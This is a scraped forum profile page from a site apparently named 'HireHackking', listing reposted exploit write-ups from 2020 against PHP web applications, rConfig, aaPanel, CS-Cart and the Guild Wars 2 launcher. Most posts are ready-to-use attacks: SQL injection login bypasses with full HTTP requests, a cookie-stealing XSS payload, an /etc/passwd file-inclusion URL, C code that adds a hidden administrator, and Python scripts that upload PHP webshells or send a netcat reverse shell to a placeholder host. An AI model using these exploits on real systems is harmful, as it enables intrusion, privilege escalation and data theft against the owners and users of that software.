Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Vehicle Parking Management System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Vehicle Parking Management System 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-10-14 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : /login.php # Parameter & Payload: username: '=''or'@email.com password: '=''or' # Proof of Concept: http://localhost/lagos-parker/login.php POST /lagos-parker/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 73 Referer: http://localhost/lagos-parker/login.php Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8 Connection: keep-alive Upgrade-Insecure-Requests: 1 email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=: undefined
  2. HireHackking

    Guild Wars 2 - Insecure Folder Permissions

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Guild Wars 2 - Insecure Folder Permissions # Date: 2020-10-09 # Exploit Author: George Tsimpidas # Software Link : https://account.arena.net/welcome # Version Build : 106915 # Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362 # Category: local Vulnerability Description: Guild Wars 2 Launcher (Gw2-64.exe) suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Everyone' group, making the entire directory 'Guild Wars 2' and its files and sub-dirs world-writable. # Local Privilege Escalation Proof of Concept D:\icacls "Guild Wars 2" Guild Wars 2 Everyone:(F) Everyone:(OI)(CI)(IO)(M,WDAC,WO,DC) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) NT AUTHORITY\Authenticated Users:(I)(M) NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) ## Insecure File Permission D:\Guild Wars 2icacls Gw2-64.exe Gw2-64.exe Everyone:(F) Everyone:(I)(F) BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\Authenticated Users:(I)(M) BUILTIN\Users:(I)(RX) #0. Download & install #1. Create low privileged user & change to the user ## As admin C:\net user lowpriv Password123! /add C:\net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. Move the Service EXE to a new name D:\Guild Wars 2whoami lowpriv D:\Guild Wars 2move Gw2-64.exe Gw2-64.frey.exe 1 file(s) moved. #3. Create malicious binary on kali linux ## Add Admin User C Code kali# cat addAdmin.c int main(void){ system("net user placebo mypassword /add"); system("net localgroup Administrators placebo /add"); WinExec("D:\\Guild Wars 2\\Gw2-64.frey.exe",0); return 0; } ## Compile Code kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Gw2-64.exe #4. Transfer created 'Gw2-64' to the Windows Host #5. Move the created 'Gw2-64' binary to the 'D:\Guild Wars 2' Folder D:\Guild Wars 2move C:\Users\lowpriv\Downloads\Gw2-64.exe . #6. Check that exploit admin user doesn't exists D:\Guild Wars 2net user placebo The user name could not be found #6. Reboot the Computer D:\Guild Wars 2shutdown /r #7. Login & now start the Guild Wars 2 Game, back doored launcher will be executed, and the user placebo will be created, and added to the Administrators group. C:\Users\lowprivnet user placebo | findstr /i "Membership Name" | findstr /v "Full" User name placebo Local Group Memberships *Administrators *Users Global Group memberships *None
  3. HireHackking

    Zoo Management System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Zoo Management System 1.0 - Authentication Bypass # Date: 02/10/2020 # Exploit Author: Jyotsna Adhana # Vendor Homepage: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=12723 # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 Step 1: Open the URL http://localhost/zoo/zms/admin/index.php Step 2: use payload jyot' or 1=1# in user and password field Malicious Request POST /zoo/zms/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 66 Origin: http://localhost Connection: close Referer: http://localhost/zoo/zms/admin/index.php Cookie: PHPSESSID=s22oss00i0ob4hcnsgkobb9r7p Upgrade-Insecure-Requests: 1 username=jyot%27+or+1%3D1+%23&password=jyot%27+or+1%3D1+%23&login= Step 3: You will be logged in as admin.
  4. HireHackking

    Simple Grocery Store Sales And Inventory System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple Grocery Store Sales And Inventory System 1.0 - Authentication Bypass # Date: 24/09/2020 # Exploit Author: Saurav Shukla & Jyotsna Adhana # Vendor Homepage: https://www.sourcecodester.com/php/14461/simple-grocery-store-sales-and-inventory-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sales-inventory-system-using-php.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 Step 1: Open the URL http://localhost/sales_inventory/login.php Step 2: use payload jyot' or 1=1# in user and password field Malicious Request::: POST /sales_inventory/ajax.php?action=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 53 Origin: http://localhost Connection: close Referer: http://localhost/sales_inventory/login.php Cookie: PHPSESSID=hdk9npcmq341ulcsn8cj6oefov username=jyot'+or+1%3d1%23&password=jyot'+or+1%3D1%23
  5. HireHackking

    rConfig 3.9.5 - Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: rConfig 3.9.5 - Remote Code Execution (Unauthenticated) # Google Dork: N/A # Date: 2020-10-13 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://www.rconfig.com/ # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.5.zip # Version: rConfig v3.9.5 # Tested on: CentOS 7 x64 # CVE : N/A import requests from requests_toolbelt.multipart.encoder import MultipartEncoder import urllib3 import re #from bs4 import BeautifulSoup urllib3.disable_warnings() url="https://x.x.x.x/" #change this to fit your URL (adding the last slash) payload="nc y.y.y.y 9001 -e /bin/sh" #change this to whatever payload you want payload_rce= "fileName=../www/test.php&code=<%3fphp+echo+system('ls')%3b%3f>&id=3" #if you want to use Method 2 for RCE, use a PHP, urlencoded payload as the value of the code parameter print("Connecting to: {}".format(url)) print("Connect back is set to: {}, please launch 'nc -lv 9001'".format(payload)) x = requests.get(url+"login.php", verify=False) version = re.search("<p>(.*)<span>", x.text) version = version.group(1) if version == "rConfig Version 3.9.5": print("Version 3.9.5 confirmed") else: print("Version is "+version+ " it may not be vulnerable") payload_final=";"+payload referer=url+"useradmin.php" origin=url proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} #in case you need to debug the exploit with Burp, add ', proxies=proxies' to any request def createuser(): multipart_data = MultipartEncoder( fields={ 'username': 'test', 'password': 'Testing1@', #password should have a capital letter, lowercase, number and a symbol 'passconf': 'Testing1@', 'email': 'test@test.com', 'ulevelid': '9', 'add': 'add', 'editid': '' } ) headers = {'Content-Type': multipart_data.content_type, "Upgrade-Insecure-Requests": "1", "Referer": referer, "Origin":origin} cookies = {'PHPSESSID': 'test'} response = requests.post(url+'lib/crud/userprocess.php', data=multipart_data, verify=False, cookies=cookies, headers=headers, allow_redirects=False) if "error" not in response.text: print("(+) User test created") else: print("(-) User couldn't be created, please debug the exploit") def exploit(): payload = { 'user': 'test', 'pass': 'Testing1@', 'sublogin': '1' } with requests.Session() as s: p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False) if "Stephen Stack" in p.text: print("(-) Exploit failed, could not login as user test") else: print("(+) Log in as test completed") params = {'path':'test', 'ext': payload_final } rce=s.get(url+'lib/ajaxHandlers/ajaxArchiveFiles.php', verify=False, params=params) if "success" in rce.text: print("(+) Payload executed successfully") else: print("(-) Error when executing payload, please debug the exploit") #if you used method 2 to auth bypass and 1 for RCE, ignore this message payload = { 'user': 'admin', 'pass': 'Testing1@', 'sublogin': '1' } with requests.Session() as s: p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False) if "Stephen Stack" in p.text: print("(-) Exploit failed, could not login as user test") else: print("(+) Log in as test completed") params = {'path':'test', 'ext': payload_final } rce=s.get(url+'lib/ajaxHandlers/ajaxArchiveFiles.php', verify=False, params=params) if "success" in rce.text: print("(+) Payload executed successfully") else: print("(-) Error when executing payload, please debug the exploit") def user_enum_update(): users=requests.get(url+'useradmin.inc.php', verify=False) #matchObj = re.findall(r'<td align="center">(.*?)</td>', users.text, re.M|re.I|re.S) if "admin" in users.text: print("(+) The admin user is present in this rConfig instance") multipart_data = MultipartEncoder( fields={ 'username': 'admin', 'password': 'Testing1@', #password should have a capital letter, lowercase, number and a symbol 'passconf': 'Testing1@', 'email': 'admin@admin.com', 'ulevelid': '9', 'add': 'add', 'editid': '1' #you may need to increment this if you want to reset the password of a different user } ) headers = {'Content-Type': multipart_data.content_type, "Upgrade-Insecure-Requests": "1", "Referer": referer, "Origin":origin} cookies = {'PHPSESSID': 'test'} response = requests.post(url+'lib/crud/userprocess.php', data=multipart_data, verify=False, cookies=cookies, headers=headers, allow_redirects=False) if "error" not in response.text: print("(+) The new password for the admin user is Testing1@") else: print("(-) Admin user couldn't be edited, please debug the exploit") elif "Admin" in users.text: print("(+) There is at least one Admin user, check "+ str(url)+"useradmin.inc.php manually and modify the exploit accordingly (erase the if-elif statements of this function and modify the user payload)") def template(): payload = { 'user': 'admin', 'pass': 'Testing1@', 'sublogin': '1' } #<%3fphp+%24sock%3Dfsockopen%28%22192.168.1.13%22%2C1234%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%3f> headers_rce = {'Content-Type': "application/x-www-form-urlencoded; charset=UTF-8", "Referer": url+"deviceConnTemplates.php", "Origin":origin, "X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.5"} with requests.Session() as s: p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False) if "Stephen Stack" in p.text: print("(-) Exploit failed, could not login as user test") else: print("(+) Log in as admin completed") rce=s.post(url+'lib/ajaxHandlers/ajaxEditTemplate.php', verify=False, data=payload_rce, headers=headers_rce) if "success" in rce.text: print("(+) File created") rce_req = s.get(url+'test.php.yml', verify=False) print("(+) Command results: ") print(rce_req.text) else: print("(-) Error when executing payload, please debug the exploit") def main(): print("Remote Code Execution + Auth bypass rConfig 3.9.5 by Daniel Monzón") print("In the last stage if your payload is a reverse shell, the exploit may not launch the success message, but check your netcat ;)") print("Note: preferred method for auth bypass is 1, because it is less 'invasive'") print("Note2: preferred method for RCE is 2, as it does not need you to know if, for example, netcat has been installed in the target machine") print('''Choose method for authentication bypass: 1) User creation 2) User enumeration + User edit ''') auth_bypass=str(input("Method>")) if auth_bypass == "1": createuser() elif auth_bypass == "2": user_enum_update() print('''Choose method for RCE: 1) Unsafe call to exec() 2) Template edit ''') rce_method=str(input("Method>")) if rce_method == "1": exploit() elif rce_method == "2": template() main()
  6. HireHackking

    Employee Management System 1.0 - Cross Site Scripting (Stored)

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Employee Management System 1.0 - Stored Cross Site Scripting #Date: 2020-10-16 #Exploit Author: Ankita Pal #Vendor Homepage: https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html #Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip #Version: 1.0 #Tested on: Windows 10 + xampp v3.2.4 Proof of Concept::: Step 1: Open the URL localhost:8081/Employee Management System/addemp.php Step 2: Use payload <img src=x onerror=alert(document.cookie)> in First Name and Last Name. Malicious Request::: POST /Employee%20Management%20System/////process/addempprocess.php HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3267707159765331982713791736 Content-Length: 1571 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/Employee%20Management%20System/////addemp.php Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv Upgrade-Insecure-Requests: 1 -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="firstName" <img src=x onerror=alert(document.cookie)> -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="lastName" <img src=x onerror=alert(document.cookie)> -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="email" abc@gmail.com -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="birthday" 2020-09-28 -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="gender" Female -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="contact" 9876543211 -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="nid" 12 -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="address" Gujarat -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="dept" CS -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="degree" BE -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="salary" -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="file"; filename="" Content-Type: application/octet-stream -----------------------------3267707159765331982713791736-- Cookie will be reflected on View Employee.
  7. HireHackking

    Alumni Management System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Alumni Management System 1.0 - Authentication Bypass #Date: 2020-10-16 #Exploit Author: Ankita Pal #Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html #Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/alumni-management-system.zip #Version: V1.0 #Tested on: Windows 10 + xampp v3.2.4 Proof of Concept::: Step 1: Open the URL http://localhost:8081/alumni-management-system/alumni/admin/login.php Step 2: use payload anki' or 1=1# for both username and password. Malicious Request::: POST /alumni-management-system/alumni/admin/ajax.php?action=login HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 53 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/alumni-management-system/alumni/admin/login.php Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv username=anki'+or+1%3D1%23&password=anki'+or+1%3D1%23 You will be login as admin of the application.
  8. HireHackking

    Employee Management System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Employee Management System 1.0 - Authentication Bypass #Date: 2020-10-16 #Exploit Author: Ankita Pal #Vendor Homepage: https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html #Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip #Version: 1.0 #Tested on: Windows 10 + xampp v3.2.4 Proof of Concept::: Step 1: Open the URL http://localhost:8081/Employee%20Management%20System/alogin.html Step 2: Use payload anki' or 1=1# for both username and password. Malicious Request::: POST /Employee%20Management%20System/process/aprocess.php HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 70 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/Employee%20Management%20System/alogin.html Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv Upgrade-Insecure-Requests: 1 mailuid=anki%27+or+1%3D1%23&pwd=anki%27+or+1%3D1%23&login-submit=Login You will be login as Admin of the application.
  9. HireHackking

    Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated) # Date: 2020-10-05 # Exploit Author: b1nary # Vendor Homepage: https://www.sourcecodester.com/php/14482/restaurant-reservation-system-php-full-source-code-2020.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/restaurants_3.zip # Version: 1.0 # Tested on: Linux + Apache2 ------------------------------------------------------------------------------------ 1. Description: ---------------------- Restaurant Reservation System 1.0 allows SQL Injection via parameter 'date' in includes/reservation.inc.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from the affected page with 'date' parameter and save it like re.req. Then run SQLmap to extract the data from the database: sqlmap -r re.req --dbms=mysql 3. Example payload: ---------------------- (time-based blind) fname=user&lname=user&date=2020-10-14' AND (SELECT 1934 FROM (SELECT(SLEEP(5)))lmWi) AND 'navS'='navS&time=16:00 - 20:00&num_guests=2&tele=123456789&comments=null&reserv-submit= 4. Burpsuite request: ---------------------- POST /restaurant/includes/reservation.inc.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 117 Origin: http://127.0.0.1 DNT: 1 Connection: close Referer: http://127.0.0.1/restaurant/reservation.php Cookie: PHPSESSID=r355njdkuddu4ac0a784i9i69m Upgrade-Insecure-Requests: 1 fname=user&lname=user&date=2020-10-14&time=16%3A00+-+20%3A00&num_guests=2&tele=123456789&comments=null&reserv-submit=
  10. HireHackking

    Company Visitor Management System (CVMS) 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Company Visitor Management System (CVMS) 1.0 - Authentication Bypass # Date: 16/10/2020 # Exploit Author: Oğuz Türkgenç # Vendor Homepage: https://phpgurukul.com/company-visitor-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=9602 # Version: 1.0 # Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3 Step 1: Open the URL http://localhost/cvms/index.php Step 2: use payload ot' or 1=1# in user and password field Malicious Request POST /cvms/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.175.128/cvms/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 36 Origin: http://localhost Connection: close Cookie: lang=english; PHPSESSID=qkg4nmdq97r4jkvkm4raa34660 Upgrade-Insecure-Requests: 1 username=ot%27+or+1%3D1+%23&password=ot%27+or+1%3D1+%23&login= Step 3: You will be logged in as admin.
  11. HireHackking

    Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Seat Reservation System 1.0 - Unauthenticated Remote Code Execution # Exploit Author: Rahul Ramkumar # Date: 2020-09-16 # Vendor Homepage: www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip # Version: 1.0 # Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1 # Exploit Tested Using: Python 2.7.18 # CVE: CVE-2020-25763 # Vulnerability Description: # Seat Reservation System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading PHP files. import requests, sys, urllib, re from lxml import etree from io import StringIO from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) import random import string def print_usage(STRING): return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET if __name__ == "__main__": if len(sys.argv) != 2: print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0]) print print_usage("Example:\t python %s 'https://192.168.1.72:443/seat_reservation/'" % sys.argv[0]) sys.exit(-1) SERVER_URL = sys.argv[1] UPLOAD_DIR = 'admin/ajax.php?action=save_movie' UPLOAD_URL = SERVER_URL + UPLOAD_DIR random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(16)]) webshell = random+'.php' s = requests.Session() s.get(SERVER_URL, verify=False) image = { 'cover': ( webshell, '<?php echo shell_exec($_GET["d3crypt"]); ?>', 'application/php', {'Content-Disposition': 'form-data'} ) } fdata = {'id': '','title':'Shelling','description':'','duration_hour':'3','duration_min':'0','date_showing':'2020-01-01','end_date':'2040-09-25'} r1 = s.post(url=UPLOAD_URL, files=image, data=fdata, verify=False) r2 = s.get(SERVER_URL, verify=False) response_page = r2.content.decode("utf-8") parser = etree.HTMLParser() tree = etree.parse(StringIO(response_page), parser=parser) def get_links(tree): refs = tree.xpath("//img") links = [link.get('src', '') for link in refs] return [l for l in links] links = get_links(tree) print('Access your webshell at: ') for link in links: if webshell in link: print(SERVER_URL + link+'?d3crypt=whoami')
  12. HireHackking

    aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: [aaPanel 6.6.6 - Authenticated Privilege Escalation] # Google Dork: [] # Date: [04.05.2020] # Exploit Author: [Ünsal Furkan Harani (Zemarkhos)] # Vendor Homepage: [https://www.aapanel.com/](https://www.aapanel.com/) # Software Link: [https://github.com/aaPanel/aaPanel](https://github.com/aaPanel/aaPanel) # Version: [6.6.6] (REQUIRED) # Tested on: [Linux ubuntu 4.4.0-131-generic #157-Ubuntu SMP Thu Jul 12 15:51:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux] # CVE : [CVE-2020-14421] if you are logged was admin; 1- go to the crontab 2- select shell script and paste your reverse shell code 3- click execute button and you are now root. because crontab.py running with root privileges. Remote Code Execution https://github.com/jenaye/aapanel
  13. HireHackking

    Hotel Management System 1.0 - Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hotel Management System 1.0 - Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020-09-23 # Exploit Author: Eren Şimşek # Vendor Homepage: https://www.sourcecodester.com/php/14458/hotel-management-system-project-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip # Version: 1.0 # Tested on: Windows/Linux - XAMPP Server # CVE : N/A # Setup: pip3 install bs4 . # Exploit Code : import requests,sys,string,random from bs4 import BeautifulSoup def get_random_string(length): letters = string.ascii_lowercase result_str = ''.join(random.choice(letters) for i in range(length)) return result_str session = requests.session() Domain = "" RandomFileName = get_random_string(5)+".php" def Help(): print("[?] Usage: python AporlorRCE.py <Domain>") def Upload(): burp0_url = Domain+"/admin/ajax.php?action=save_category" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": " http://192.168.1.104/admin/index.php?page=categories", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------11915271121184037197158049421", "Connection": "close"} burp0_data = "-----------------------------11915271121184037197158049421\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n -----------------------------11915271121184037197158049421\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n1\r\n -----------------------------11915271121184037197158049421\r\nContent-Disposition: form-data; name=\"price\"\r\n\r\n1\r\n -----------------------------11915271121184037197158049421\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n -----------------------------11915271121184037197158049421--\r\n" try: Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data) if Resp.text == "1": print("[+] Shell Upload Success") else: print("[-] Shell Upload Failed") except: print("[-] Request Failed") Help() def Login(): burp0_url = Domain+"/admin/ajax.php?action=login" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": " http://localhost/fos/admin/login.php", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"} burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"} try: Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data) if Resp.text == "1": print("[+] Login Success") else: print("[+] Login Failed") except: print("[-] Request Failed") Help() def FoundMyRCE(): global FileName burp0_url = Domain+"/admin/index.php?page=categories" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} try: Resp = session.get(burp0_url, headers=burp0_headers) Soup = BeautifulSoup(Resp.text, "html5lib") Data = Soup.find_all("img") for MyRCE in Data: if RandomFileName in MyRCE["src"]: FileName = MyRCE["src"].strip("../assets/img/") print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/")) except: print("[-] Request Failed") Help() def Terminal(): while True: Command = input("Console: ") burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command try: Resp = session.get(burp0_url) print(Resp.text) except KeyboardInterrupt: print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23") except: print("[-] Request Error") if __name__ == "__main__": if len(sys.argv) == 2: Domain = sys.argv[1] Login() Upload() FoundMyRCE() Terminal() else: Help()
  14. HireHackking

    CS-Cart 1.3.3 - 'classes_dir' LFI

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CS-Cart unauthenticated LFI # Date: 2020-09-22 # Exploit Author: 0xmmnbassel # Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html # Tested at: ver. 1.3.4 # Vulnerability Type: unauthenticated LFI http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00 example: http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
  15. HireHackking

    Seat Reservation System 1.0 - Unauthenticated SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Title: Seat Reservation System 1.0 - Unauthenticated SQL Injection # Exploit Author: Rahul Ramkumar # Date: 2020-09-16 # Vendor Homepage: www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip # Version: 1.0 # Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1 # CVE: CVE-2020-25762 # Description The file admin_class.php does not perform input validation on the username and password parameters. An attacker can send malicious input in the post request to /admin/ajax.php?action=login and bypass authentication, extract sensitive information etc. #POC 1) Navigate to the admin login page Example: http://192.168.1.72/seat_reservation/admin/login.php 2) Fill in dummy values for 'username' and 'password' fields and send the request via an HTTP intercept tool 3) Save the request to file. Example, seat_reservation_sqli.req POST /seat_reservation/admin/ajax.php?action=login HTTP/1.1 Host: 192.168.1.72 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 32 Origin: http://192.168.1.72 DNT: 1 Connection: close username=admin&password=dummy 4) Run SQLmap on the file, sqlmap -r seat_reservation_sqli.req --dbms=mysql --threads=10
  16. HireHackking

    CS-Cart 1.3.3 - authenticated RCE

    HireHackking posted a blog entry in Hacker Technology
